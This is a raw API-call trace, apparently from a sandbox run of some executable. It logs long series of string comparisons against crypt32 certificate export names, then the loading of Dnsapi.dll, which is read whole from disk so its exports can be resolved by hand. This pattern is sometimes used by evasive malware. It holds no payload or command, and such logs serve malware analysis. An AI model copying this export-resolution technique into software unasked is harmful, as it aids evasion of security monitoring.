-1 [0126.873] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0126.873] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0126.873] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0126.873] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0126.873] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.873] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0126.874] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.874] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0126.875] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.875] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.876] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.876] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.876] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0126.877] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.877] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.878] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.878] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.878] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0126.878] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0126.878] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0126.878] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0126.878] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0126.879] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0126.879] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0126.880] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0126.880] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0126.880] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0126.881] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.881] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0126.882] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0126.883] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0126.883] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0126.883] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0126.883] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0126.883] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0126.883] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0126.883] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0126.883] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0126.893] GetProcessHeap () returned 0x590000 [0126.893] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40cb040 | out: hHeap=0x590000) returned 1 [0126.902] GetProcessHeap () returned 0x590000 [0126.902] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9300 [0127.103] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0127.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0127.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0127.121] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0127.121] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0127.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0127.121] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0127.121] GetProcessHeap () returned 0x590000 [0127.121] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa7b88) returned 0x3a3d010 [0127.123] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0127.123] ReadFile (in: hFile=0x17c, lpBuffer=0x3a3d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a3d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0127.455] CloseHandle (hObject=0x17c) returned 1 [0127.455] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0127.456] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0127.456] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0127.456] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 